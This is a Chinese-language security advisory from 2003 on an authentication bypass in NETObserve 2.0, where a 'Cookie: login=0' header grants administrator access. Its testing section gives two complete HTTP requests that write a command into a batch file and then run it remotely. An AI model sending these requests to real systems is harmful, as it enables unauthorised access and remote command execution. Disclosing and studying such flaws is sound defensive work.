NETObserve用户验证绕过漏洞
发布日期:2003-12-30
更新日期:2004-01-04
受影响系统:ExploreAnywhere Software NETObserve 2.0
描述:
BUGTRAQ ID:
9319
NETObserve是一款拥有多种监视和系统管理功能的解决方案。
NETObserve在验证过程中存在问题,远程攻击者可以利用这个漏洞无需验证进行系统访问。
由于在登录过程中不充分检查验证信息,攻击者只要在HTTP请求头中提交包含'Cookie: login=0'的数据,就可以以管理员权限访问系统。
<*来源:Peter Winter-Smith (
peter4020@hotmail.com)
链接:
http://www[.]elitehaven[.]net/netobserve.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Peter Winter-Smith 提供了如下测试方法:
REQUEST #1:
--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer:
http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0
newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------
REQUEST #2:
--------------------------------------------------------------------------
GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0
--------------------------------------------------------------------------
建议:
厂商补丁:
ExploreAnywhere Software
------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.exploreanywhere.com/no-intro.php浏览次数:2822
严重程度:0(网友投票)
